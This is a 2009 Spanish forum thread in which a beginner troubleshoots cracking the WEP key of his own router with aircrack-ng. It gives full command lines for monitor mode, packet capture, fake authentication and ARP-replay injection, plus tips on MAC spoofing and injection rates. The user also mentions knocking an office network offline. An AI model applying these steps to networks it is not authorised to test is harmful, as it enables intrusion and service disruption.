?>/script>'; } ?> Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers) Widgets Magazine

Autor Tema: Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers)  (Leído 5195 veces)

0 Usuarios y 1 Visitante están viendo este tema.

ewinch

  • Visitante
No consigo inyectar con el AirCrack, creo que es por los drivers pero no estoy seguro. Os agradezco cualquier ayuda.

Os pongo en situacion:
Tengo un Assus EeePc 900 al que le he quitado el Sandrox y le he puesto Ubuntu 9.04, soy muy nuevo en esto del linux, pero me gusta leer y aprender solo por hoby.

Al hacer un lspci me dice:  Ethernet controller: Atheros Communications Inc. AR242x 802.11abg Wireless PCI Express Adapter (rev 01). Segun he leido el chipset es el AR5007EG.

He leido bastante en los dos ultimos dias sobre Aircrack y esta tarde me he puesto manos a la obra. Os cuento lo que he hecho.

1º Me baje los drivers de Madwifi, los parchee y los instale, pero creo que no lo hice bien, porque a comprovar con airmon-n que drivers estaban instalados me dio esto:

Interface   Chipset      Driver

wlan0      Atheros    ath5k - [phy0]

Asin que entre en "controladores de hardware" y active los driver Madwifi, hecho esto me quede volvi a airmon-n y me dio lo mismo de antes

Interface   Chipset      Driver

wlan0      Atheros    ath5k - [phy0]

Reinicie el ordenador y me quede sin señal de wifi :-\

root@ewinch-asus:/home/ewinch/wifi# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

pan0      no wireless extensions.

Desactive  los Madwifi e intente hacer la audotoria con los ath5k.

Os pongo todos los pasos hasta llegar al apartado de inyectar trafico, el problema es que las IVs apenas subian, y me da un error, "Notice: got a deauth/disassoc packet. Is the source MAC associated ?" Creo que significa que no he asociado la mac, pero yo creo que si.

Puede ser por los drivers? cuales instalo y como?

Gracias por anticipado.



Lo puse en modo monitor.

sudo airmon-ng start wlan0 1

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID   Name
2652   NetworkManager
2656   wpa_supplicant
2978   dhclient


Interface   Chipset      Driver

wlan0      Atheros    ath5k - [phy0]
            (monitor mode enabled on mon0)



-capture las ivs

sudo airodump-ng -c 1 --bssid 00:1C:DF:XX:XX:XX -w output mon0



CH  1 ][ Elapsed: 1 hour 7 mins ][ 2009-08-20 20:15 ][ fixed channel mon0: 14          
                                                                                        
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID      
                                                                                        
00:1C:DF:XX:XX:XX  -28 100    35951     5449    0   1  54   WEP  WEP    OPN  Ewinch    
                                                                                        
BSSID              STATION            PWR   Rate    Lost  Packets  Probes              
                                                                                        
00:1C:DF:XX:XX:XX  00:22:43:XX:XX:XX    0    0 - 1   595602  2391511                    






-autentificacion falsa con el punto de acceso.

ewinch@ewinch-asus:~$ sudo aireplay-ng -1 0 -e Ewinch -a 00:1C:DF:XXX:XX:XX -h 00:22:43:XX:XX:XX mon0
[sudo] password for ewinch:
19:16:16  Waiting for beacon frame (BSSID: 00:1C:DF:XX:XX:XX) on channel 1

19:16:16  Sending Authentication Request (Open System)
19:16:16  Authentication successful
19:16:16  Sending Association Request
19:16:16  Association successful :-) (AID: 1)




-inyectar paquetes



ewinch@ewinch-asus:~$ sudo aireplay-ng -3 -b 00:1C:DF:XX:XX:XX -h 00:22:43:37
:92 mon0
[sudo] password for ewinch:
20:26:03  Waiting for beacon frame (BSSID: 00:1C:DF:XX:XX:XX) on channel 1
Saving ARP requests in replay_arp-0820-202603.cap
You should also start airodump-ng to capture replies.
Read 573 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 102337 packets (got 2 ARP requests and 28439 ACKs), sent 18629 packets...(499 pps)



« Última modificación: 20-08-2009, 23:48 (Jueves) por ewinch »

manel

  • Visitante
Re: Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers)
« Respuesta #1 en: 20-08-2009, 23:29 (Jueves) »
Buenas

Primero deberias de quitar las mac's, por lo menos los 6 ultimos caracteres (00:1C:DF:XX:XX:XX)

Inyectar inyectas:

....sent 18629 packets...(499 pps)

Pero no estas asociado, prueba a poner 30 en el A1 para que se reasocie cada 30 segundos:

  #sudo aireplay-ng -1 30 -e Ewinch -a 00:1C:DF:XX:XX:XX -h 00:22:43:XX:XX:XX mon0

De paso le puedes bajar el rate para mejorar la asociacion falsa:

  #iwconfig mon0 rate 1M

antes de lanzar el A1

Un saludo


ewinch

  • Visitante
Re: Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers)
« Respuesta #2 en: 20-08-2009, 23:53 (Jueves) »
Que despiste¡¡, ya edite las mac.
Lo de poner el A1 a 30 ya lo intente con el mismo resultado.  ???
Voy a leer que es eso del rate y a cambiarlo para provar.

Gracias Manel

Pero esto no significa que estoy asociado??

BSSID              STATION            PWR   Rate    Lost  Packets  Probes               
                                                                                       
00:1C:DF:XX:XX:XX  00:22:43:XX:XX:XX    0    0 - 1   595602  2391511           

Entonces se puede hacer una autentificacion falsa e inyectar correctamente con los drivers Ath5k?

« Última modificación: 21-08-2009, 00:23 (Viernes) por ewinch »

manel

  • Visitante
Re: Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers)
« Respuesta #3 en: 21-08-2009, 00:28 (Viernes) »
Entonces se puede hacer una autentificacion falsa e inyectar correctamente con los drivers Ath5k?
Segun esta prueba si:

https://foro.seguridadwireless.net/nueva-generacion-wireless/madwifi-vs-ath5k/

Respecto a lo del rate, si despues de lanzar el airodump, abre otra consola y teclea:

#aireplay-ng -9 -B mon0

Veras las posibilidades de inyeccion segun el rate

Un saludo


ewinch

  • Visitante
Re: Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers)
« Respuesta #4 en: 21-08-2009, 01:38 (Viernes) »
Baje el rate y captura ls IVs mas lentamente.

Mañana seguire leyendo a ver si me entero de los que significa "Rate" y las posibilidades de inyeccion segun el rate. He estado buscando en el foro pero no lo encuentro, posiblemente porque no puedo mantener los ojos abiertos  ;D ;D

Un saludo y gracias.


Aetsu

  • Visitante
Re: Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers)
« Respuesta #5 en: 21-08-2009, 13:09 (Viernes) »
Yo tengo la misma tarjeta Atheros que tú y en lugar de ubuntu tengo kubuntu, pero hoy me pongo también haber si conseguimos algo.

Un saludo.

Edito:  He conseguido inyectar con los drivers ath5k(los que trae ubuntu de base). He estado unos 15 min para que comenzase ha inyectar, pero ha partir de ahi todo bién.

« Última modificación: 21-08-2009, 19:30 (Viernes) por Aetsu »

manel

  • Visitante
Re: Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers)
« Respuesta #6 en: 21-08-2009, 20:36 (Viernes) »
Edito:  He conseguido inyectar con los drivers ath5k(los que trae ubuntu de base). He estado unos 15 min para que comenzase ha inyectar, pero ha partir de ahi todo bién.

 >:( >:(

ewinch, esto responde a tus dudas


ewinch

  • Visitante
Re: Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers)
« Respuesta #7 en: 22-08-2009, 00:30 (Sábado) »
Pues si,  ;D
Ya me he enterado que es eso del Rate,  ;D
Hoy lo he vuelto a intentar en la oficina, y os cuento que ha pasado: Lo he dejando inyectando y me he ido a tomar un café, cuando he vuelto (20 min) había capturado 45000 IVs, pero había parado en esa cantidad. He indo a entrar en internet para seguir leyendo (con otro ordenador)  y ESTABA BLOQUEADO EL ROUTER ¡¡ , he dejado a todos sin internet  ^-^ , Menos mal que soy el jefe, jejeje.
He tenido que hacer un reset al router, creo que tiene alguna opción para cortar en caso de ataque, Puede ser o ha sido casualidad??.
Ahora voy a volver a intentarlo en casa.

Otra cosa que no viene a cuento. Tengo un usb wifi que estaba tirado en un cajon y estoy intentando instalar en el ordenador de casa, es mas cómodo para aprender que con la pantala pequeña del Asus, es un Belkin F5D8053, googleando he visto que lleva el chipset ralink y hay que meterle los driver rt2870, ya me los he bajado de internet. PERO COMO SE INSTALAN. Hasta ahora no habia tenido que instalar ninguno de esta manera, todos los descargado desde el terminal.
He leido que hay que descomprimirlo, copilarlo e instalarlo. Pero aunque parezca mentira no he encontrado ningun manual que lo explique, solo los de tipo:

escribe sodu ital tal, tal tal y pulsa intro

No hay ningun manual que explique la funcion y lo que significa lo que se escribe en la consola (Seguro que si existe pero no la encuentro)

Gracias de nuevo.


ewinch

  • Visitante
Re: Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers)
« Respuesta #8 en: 22-08-2009, 02:03 (Sábado) »
Yo tengo la misma tarjeta Atheros que tú y en lugar de ubuntu tengo kubuntu, pero hoy me pongo también haber si conseguimos algo.

Un saludo.

Edito:  He conseguido inyectar con los drivers ath5k(los que trae ubuntu de base). He estado unos 15 min para que comenzase ha inyectar, pero ha partir de ahi todo bién.

Pues yo en casa no consigo que aumenten los #Data  :'( :'(

Aetsu me puedes decir como lo haces exactamente a ver si veo en que me equivoco??
Gracias.


rockernault

  • Visitante
Re: Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers)
« Respuesta #9 en: 22-08-2009, 02:12 (Sábado) »
yo tengo los mismos drivers

ath5k

y van muy bien..  inclusive la misma tarjeta atheros 5007eg   pero si tienen problemas es por el router..


Aetsu

  • Visitante
Re: Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers)
« Respuesta #10 en: 23-08-2009, 04:41 (Domingo) »
Yo tengo la misma tarjeta Atheros que tú y en lugar de ubuntu tengo kubuntu, pero hoy me pongo también haber si conseguimos algo.

Un saludo.

Edito:  He conseguido inyectar con los drivers ath5k(los que trae ubuntu de base). He estado unos 15 min para que comenzase ha inyectar, pero ha partir de ahi todo bién.

Pues yo en casa no consigo que aumenten los #Data  :'( :'(

Aetsu me puedes decir como lo haces exactamente a ver si veo en que me equivoco??
Gracias.

Código: [Seleccionar]
#airmon-ng stop wlan0
#airmon-ng start wlan0
#ifconfig wlan0 down
#ifconfig mon0 down
#ifconfig mon0 up
#airodump-ng mon0
...
Esto es lo que yo hice, puede que sobren acciones, pero de momento aún no he podido comprobarlo, ya que últimamente ando ocupado.
Lo de mon0 cuando pongas la tarjeta en modo monitor veras de donde aparece. ;D

Siento no poder ser mas extenso, pero ahora me pillas en mal momento, pruebalo y sino te aclaras avisa y cuando pueda contesto. ;)


ewinch

  • Visitante
Re: Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers)
« Respuesta #11 en: 25-08-2009, 23:31 (Martes) »
Ya he sacado hecho mi primera auditoria con exito en el router de mi casa. Pongo los fallos que cometia por si a alguien le pasa lo mismo.

1º HAY QUE LEER MAS  :-[ (pedón por levantar la voz), la emocion del comienzo hace que lo quieras hacer todo rapido, despues de dedicar un par de dias solo a leer casi todo lo que me he encontrado y a usar el buscador a ido todo sobre ruedas.

Ya esta, ese era el unico fallo  ;D ;D

Bueno, habia unos cuantos mas:

2º Tengo un router Belkin N de los nuevos. Cortan en caso de identificar un ataque.
3º Intentava autentificarme con mac falsa 00:11:22:33:44:55 y no lo conseguia, lo he conseguido con una mas creible, por lo que he leido algunos Ap no dejan asociarse a Mac´s "raras"
4º El concepto de "muy cerca del Ap" es muy subjetivo, en mi caso lo tenia a dos metros, alejandome a 5 metros han salido las IVs como rosquillas.
5º Hay que tener paciencia. Habia leido algunos post en los que decian que habian sacado la key en 20 min (cosa que no dudo).Despues de usar "correctamente" el buscador me he dado cuenta que se necesitaba mas tiempo, por lo leido, el tiempo para capturar las IVs depende de muchas cosas, igual que la cantidad de estas para conseguir la key. Yo he sacado la key (Wep de 64 bits) en una hora y media mas o menos con 35000 IVs.

Pues ha seguir leyendo, ahora voy a poner las cosas mas dificiles para practicar con los otros tipos de ataques.

P.D  Muchas gracias a todos los que invertis vuestro tiempo en hacer esos maravillosos manuales. Gracias.


rockernault

  • Visitante
Re: Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers)
« Respuesta #12 en: 25-08-2009, 23:42 (Martes) »
que diferencia hay entre G y N??

en cuestion de ataques a cifrados wep??

que pudiste notar?? se resiste??


ewinch

  • Visitante
Re: Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers)
« Respuesta #13 en: 26-08-2009, 01:25 (Miércoles) »
wikipedia escribió:
802.11n

En enero de 2004, el IEEE anunció la formación de un grupo de trabajo 802.11 (Tgn) para desarrollar una nueva revisión del estándar 802.11. La velocidad real de transmisión podría llegar a los 600 Mbps (lo que significa que las velocidades teóricas de transmisión serían aún mayores), y debería ser hasta 10 veces más rápida que una red bajo los estándares 802.11a y 802.11g, y cerca de 40 veces más rápida que una red bajo el estándar 802.11b. También se espera que el alcance de operación de las redes sea mayor con este nuevo estándar gracias a la tecnología MIMO Multiple Input � Multiple Output, que permite utilizar varios canales a la vez para enviar y recibir datos gracias a la incorporación de varias antenas (3). Existen también otras propuestas alternativas que podrán ser consideradas y se espera que el estándar que debía ser completado hacia finales de 2006, se implante hacia 2008. A principios de 2007 se aprobó el segundo borrador del estándar. Anteriormente ya habían dispositivos adelantados al protocolo y que ofrecían de forma no oficial éste estándar (con la promesa de actualizaciones para cumplir el estándar cuando el definitivo estuviera implantado).

A diferencia de las otras versiones de Wi-Fi, 802.11n puede trabajar en dos bandas de frecuencias: 2,4 GHz (la que emplean 802.11b y 802.11g) y 5 GHz (la que usa 802.11a). Gracias a ello, 802.11n es compatible con dispositivos basados en todas las ediciones anteriores de Wi-Fi. Además, es útil que trabaje en la banda de 5 GHz, ya que está menos congestionada y en 802.11n permite alcanzar un mayor rendimiento.


Eso es en teoria, mi Ap lo tengo puesto en G y en N y ni usando la tarjeta wifi N tengo mas alcance, y ya de velocidad ni hablamos  :-\

Edito: Ahora que lo pienso.... lo mismo por eso me tuve que retirar 5 metros para pillar bien los datas  ??? cuando en los manuales pone que con 2 mts esta bien??

« Última modificación: 26-08-2009, 01:30 (Miércoles) por ewinch »